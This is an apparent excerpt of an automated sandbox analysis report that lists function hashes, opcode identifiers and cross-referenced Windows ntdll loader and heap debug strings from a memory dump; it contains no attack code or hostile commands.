                                                                                                                                                                                                                                • Opcode ID: d28e37e830d7f0d1faf8af6b0cc34cfddb39899feff9945719f74f3a5d02b597
                                                                                                                                                                                                                                • Instruction ID: b0bd43081709e98db9a983e89c212fb84f8d3b6ca5a8220e93aa3ed0daccfd2c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d28e37e830d7f0d1faf8af6b0cc34cfddb39899feff9945719f74f3a5d02b597
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C412734B14B42DFD712CF28C994B99B3E4FF81320F544569D9068B682C778B9A1CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ---------------------------------------, xrefs: 1F26EDF9
                                                                                                                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1F26EDE3
                                                                                                                                                                                                                                • Entry Heap Size , xrefs: 1F26EDED
                                                                                                                                                                                                                                • HEAP: , xrefs: 1F26ECDD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                                • Opcode ID: a39dcb88540f3cb3d7441fdf985e7e72629e6194f7c2f1bd8d99b28b4286074e
                                                                                                                                                                                                                                • Instruction ID: b9e568a1ecd8d6122caae2222c747a988269aa38257255dcb07c613263938d36
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a39dcb88540f3cb3d7441fdf985e7e72629e6194f7c2f1bd8d99b28b4286074e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5417A75A00A22DFCB14CF58C48894ABBA9FF4A36472581ADEC059F651D732FC92CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                • Opcode ID: b6e8112d55cc47ca7d0c51527f8d4087fb8e83bad21db987ac8f06af904bf2fe
                                                                                                                                                                                                                                • Instruction ID: 79f41eb367ea28b521ab0ac8f9fe6fcb2c75479d6c5debdc1a2d3f6ac3610219
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e8112d55cc47ca7d0c51527f8d4087fb8e83bad21db987ac8f06af904bf2fe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D313935610BC5EFD722CB28C869F8977E4FF02B20F044589E8028BA92D77AB971C651
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                                • Opcode ID: 9d1311d97783a12ea351a9ca793b7cee843f1fb3502a404639191f1a75ec00b4
                                                                                                                                                                                                                                • Instruction ID: aa5400c2d001c9580bbf1bc6f3e29737826c11112fb5bb18be2aaf8cc5fb9f6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d1311d97783a12ea351a9ca793b7cee843f1fb3502a404639191f1a75ec00b4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04813D71D002699BDB31CF54CC44BDEBAB8AF09710F4141DAE90AB7280E771AE94CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F233439
                                                                                                                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1F23344A, 1F233476
                                                                                                                                                                                                                                • LdrpFindDllActivationContext, xrefs: 1F233440, 1F23346C
                                                                                                                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1F233466
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                                • Opcode ID: 9a934783cc344d3882fa44a520bd96b809052f837b39620d30cb1c3b0c9941f4
                                                                                                                                                                                                                                • Instruction ID: df82a12404831f89fe0da4df0b945d1ab19d0349c8f77ea7aef558063d51965f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a934783cc344d3882fa44a520bd96b809052f837b39620d30cb1c3b0c9941f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C315FB2E80392AFEB21DB04C988B95B6A4FB00364F079127E8455B650F771BDB8C3D1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F22A7AF
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1E2382
                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 1F22A7A5
                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1F22A79F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                • Opcode ID: 5fb709445614c8a13cf36c63cd287d5ae568843774c68b97d89d4f6f70b52d33
                                                                                                                                                                                                                                • Instruction ID: 236d2609ba230f6925247e99096d60b82223922ff6571b5f4f12bc7abbc6f8ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb709445614c8a13cf36c63cd287d5ae568843774c68b97d89d4f6f70b52d33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E03105B6E00291AFE7108F69C8C8A9A77F5EB84720F650159EC01ABA41E672BC61CF51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                                • Opcode ID: 6be5b31cc18d4f0a6c3179cc870b27f8736425ca5027018f1060119fb13e09db
                                                                                                                                                                                                                                • Instruction ID: 8ee8f806bc78247501a5a2a9ce35f507053d2bea9370523c09ee2b944edadecf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6be5b31cc18d4f0a6c3179cc870b27f8736425ca5027018f1060119fb13e09db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C910E71608B82EBC315DB74C8A4B6AB7F5BF84B40F11055DF8419F681EB35B862CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F229F2E
                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 1F229F24
                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 1F229F1C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                                                                • Opcode ID: 427c3f6d6f33cb7cb14cc58106f42afcefe24dc262ef40e0f2ea8f3846e8cfa5
                                                                                                                                                                                                                                • Instruction ID: ee100ac9eed1a1b5ccd15df769caad42fa9020ea1b08effe68c45f610e56dd71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 427c3f6d6f33cb7cb14cc58106f42afcefe24dc262ef40e0f2ea8f3846e8cfa5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B71F179A006469FCB05DFA8C984AAEB7F4FF44308F54406DE80AEB651E735BE61CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                • Opcode ID: acc61d472ba8c1a3860732d897901d22ffae35b7f885a07662602ff1a76206eb
                                                                                                                                                                                                                                • Instruction ID: f450d4da19405573525c166a0e28bc87aaaad1d8820f97f34864a8162fef249b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acc61d472ba8c1a3860732d897901d22ffae35b7f885a07662602ff1a76206eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62513775B00B429BC312DF39CD84F5A77A2BB84310F94066DE8538B692E775B874CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2380F3
                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 1F2380E2
                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 1F2380E9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                • Opcode ID: 4e7c0034023c05ec62f4ca801cb9748751a420a130957f6860143c187de243ae
                                                                                                                                                                                                                                • Instruction ID: 8c78b1eb706a25037d9c0ff074ad5bdb4c501d23cda40fa386117c4f84db61ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e7c0034023c05ec62f4ca801cb9748751a420a130957f6860143c187de243ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F4127B5904751ABC711DF24CD88B8B37E8EF84720F00492AFC9997650E775F924DB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1F244508
                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 1F24450F
                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 1F244519
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                • Opcode ID: a7ec845ab7e417474dc46ffcfcec0696c2e67e7121b71ef39c580ae27da4ed9f
                                                                                                                                                                                                                                • Instruction ID: 55aa7ab684b98fded8bb4df87bf5570aca0f8eb4a5e5df36dc4018e735b1b4a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7ec845ab7e417474dc46ffcfcec0696c2e67e7121b71ef39c580ae27da4ed9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41E1726147229BCB18CF68C840A5677E4FF88760B360659EC98DB259E7B1ED00CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                                • API String ID: 3446177414-921169906
                                                                                                                                                                                                                                • Opcode ID: 2758c9c09250ffa79a2f9b6e6ee6630d1eb3e1f5edb5b225e6d84e71e4a3541e
                                                                                                                                                                                                                                • Instruction ID: 12eb0e320aeb95984cb4c4dea67125f8ac406872f42e2d38e4dc8397c4e6660d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2758c9c09250ffa79a2f9b6e6ee6630d1eb3e1f5edb5b225e6d84e71e4a3541e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5221297660061DBFEB059AA0CD88DFF7B7DEF85299B140454FA02A2100E634AE21EB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b4c57ec0a492ddfa09929326664fb12b8133735cf926d79d95e78651177afc85
                                                                                                                                                                                                                                • Instruction ID: 073944ac7f586b5bddde9f7c63751b0174f1e96799c424a43d323a353e9735fc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4c57ec0a492ddfa09929326664fb12b8133735cf926d79d95e78651177afc85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE10475E00B49CFCB26CFA9C984A8DBBF5FF48310F21452AE856AB661D771A851CF10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 241458380643ea3d84ee5e0c384d7484920cd5236076e528a88ebf9cd850fbc0
                                                                                                                                                                                                                                • Instruction ID: fb6ef28cc90055217d89dcf72849a316567ceb9b2b269d600cba6b650f44bff1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 241458380643ea3d84ee5e0c384d7484920cd5236076e528a88ebf9cd850fbc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F7124B1E116299FDF04CFA4D884BDDBBB9FF48315F14402AD906EB250E734A94ACB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 7705ccfce6a7ebf3b225fc93a6659aa126ccfadc3beee2b4082dceeba4f08a5e
                                                                                                                                                                                                                                • Instruction ID: 6381441fd1c0230be4db03dddf64bcf9d0957ea533f23e6ddeb126e29b782102
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7705ccfce6a7ebf3b225fc93a6659aa126ccfadc3beee2b4082dceeba4f08a5e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94513735721A239FDF08CE28C8A5A59B7E5FB89310B21416DD906DB720EB71BC51CF80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: e7039538a340540efd608e6893f5ae5630a6aa290a1ee5013416d6f3e79b0db5
                                                                                                                                                                                                                                • Instruction ID: 2929434680d727cb2739215692afa49b88b55ea7487e20543e8d7af7717db1d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7039538a340540efd608e6893f5ae5630a6aa290a1ee5013416d6f3e79b0db5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C65155B2E002199FDF08CF99D844ADDBBB5FF48321F10812AE815BB250E775A909CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                • Opcode ID: 1efcd54ef420af83f9c5027f67f2ca82bd80763ecefe1f9bb5b3eea02c0c05b5
                                                                                                                                                                                                                                • Instruction ID: 0f06bab5a268da24e96d4b3c3f937b46def17444eac30ebd8857d06b4f89f9fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1efcd54ef420af83f9c5027f67f2ca82bd80763ecefe1f9bb5b3eea02c0c05b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C3126B9E11629DFCF15DFA8D888A9DBBF0FB48320F10416AE811BB690DB356910CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                • Opcode ID: 0ac80194373bbeda2c911a07859342630b2e7b35785379602e6ce702eb6bb2a5
                                                                                                                                                                                                                                • Instruction ID: 3cd11b01f3fcb3f4999f7628793d7383c8ec20962ba9e8395bf0a766f6d20dc2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ac80194373bbeda2c911a07859342630b2e7b35785379602e6ce702eb6bb2a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C326570D0036ADFDB25CF64C984BDABBB1BF58304F0041E9D449AB241EBB5AA94DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
